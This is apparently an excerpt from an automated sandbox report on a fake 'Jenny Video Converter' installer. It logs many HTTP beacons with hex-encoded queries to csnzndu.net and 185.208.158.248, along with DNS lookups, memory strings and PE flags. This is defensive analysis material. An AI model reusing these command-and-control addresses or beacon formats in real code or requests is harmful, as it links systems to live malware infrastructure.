        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928e4f885a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b416e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993bcd6b9317 HTTP/1.1Host: csnzndu.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficDNS traffic detected: DNS query: time.windows.com
        Source: global trafficDNS traffic detected: DNS query: csnzndu.net
        Source: jennyvideoconverter32.exe, 00000008.00000002.2565587924.000000000339D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12eab517aa5c96bd86e8928
        Source: jennyvideoconverter32.exe, 00000008.00000002.2562237741.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd86f09f429110aa5197c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
        Source: ZFllSoXpoT.exe, 00000000.00000002.2562216225.0000000002108000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.exe, 00000000.00000003.1310429003.0000000002330000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000002.2562332360.0000000000822000.00000004.00000020.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1314857869.0000000002148000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000002.2563242691.0000000002140000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1313032866.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1320110050.0000000000822000.00000004.00000020.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1313145349.0000000002150000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1320264697.0000000000822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fsf.org/
        Source: is-QGIC5.tmp.3.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
        Source: svchost.exe, 00000007.00000002.2561939603.0000020A1D087000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2562809603.0000020A1D902000.00000004.00000020.00020000.00000000.sdmp, regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.7.drString found in binary or memory: http://standards.iso.org/iso/19770/-2/2009/schema.xsd
        Source: is-K6ASR.tmp.3.drString found in binary or memory: http://tukaani.org/
        Source: is-K6ASR.tmp.3.drString found in binary or memory: http://tukaani.org/xz/
        Source: ZFllSoXpoT.exe, 00000000.00000002.2562216225.0000000002108000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.exe, 00000000.00000003.1310429003.0000000002330000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000002.2562332360.0000000000822000.00000004.00000020.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1314857869.0000000002148000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000002.2563242691.0000000002140000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1313032866.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1320110050.0000000000822000.00000004.00000020.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1313145349.0000000002150000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000003.1320264697.0000000000822000.00000004.00000020.00020000.00000000.sdmp, is-89P6A.tmp.3.drString found in binary or memory: http://www.gnu.org/licenses/
        Source: ZFllSoXpoT.tmp, ZFllSoXpoT.tmp, 00000003.00000000.1311659479.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-GTTMJ.tmp.3.dr, ZFllSoXpoT.tmp.0.drString found in binary or memory: http://www.innosetup.com/
        Source: ZFllSoXpoT.exe, 00000000.00000003.1311021489.0000000002114000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.exe, 00000000.00000003.1310859620.0000000002330000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, ZFllSoXpoT.tmp, 00000003.00000000.1311659479.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-GTTMJ.tmp.3.dr, ZFllSoXpoT.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
        Source: ZFllSoXpoT.exe, 00000000.00000003.1311021489.0000000002114000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.exe, 00000000.00000003.1310859620.0000000002330000.00000004.00001000.00020000.00000000.sdmp, ZFllSoXpoT.tmp, 00000003.00000000.1311659479.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-GTTMJ.tmp.3.dr, ZFllSoXpoT.tmp.0.drString found in binary or memory: http://www.remobjects.com/psU

        System Summary

        barindex
        Source: jennyvideoconverter32.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: ET Ammeter Side 10.7.46.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0042F530 NtdllDefWindowProc_A,3_2_0042F530
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00423B94 NtdllDefWindowProc_A,3_2_00423B94
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004125E8 NtdllDefWindowProc_A,3_2_004125E8
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004789DC NtdllDefWindowProc_A,3_2_004789DC
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004573CC PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,3_2_004573CC
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,3_2_0042E944
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_004555D0
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_0040840C0_2_0040840C
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004804C63_2_004804C6
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004709503_2_00470950
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004352D83_2_004352D8
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004677103_2_00467710
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0043036C3_2_0043036C
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004444D83_2_004444D8
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004345D43_2_004345D4
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004866043_2_00486604
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00444A803_2_00444A80
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00430EF83_2_00430EF8
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004451783_2_00445178
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0045F4303_2_0045F430
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0045B4D83_2_0045B4D8
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004875643_2_00487564
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004455843_2_00445584
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004697703_2_00469770
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0048D8C43_2_0048D8C4
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004519A83_2_004519A8
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0043DD603_2_0043DD60
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_004010518_2_00401051
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_00401C268_2_00401C26
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E453A08_2_02E453A0
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E3E18D8_2_02E3E18D
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E39E848_2_02E39E84
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E44E298_2_02E44E29
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E2EFAD8_2_02E2EFAD
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E3DC998_2_02E3DC99
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E384428_2_02E38442
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E3AC3A8_2_02E3AC3A
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E3E5A58_2_02E3E5A5
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E42DB48_2_02E42DB4
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E5E0028_2_02E5E002
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E5B4E58_2_02E5B4E5
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E5BCEB8_2_02E5BCEB
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E5BD588_2_02E5BD58
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Jenny Video Converter\is-1GTV3.tmp 11074A6FB8F9F137401025544121F4C3FB69AC46CC412469CA377D681D454DB3
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: String function: 00405964 appears 116 times
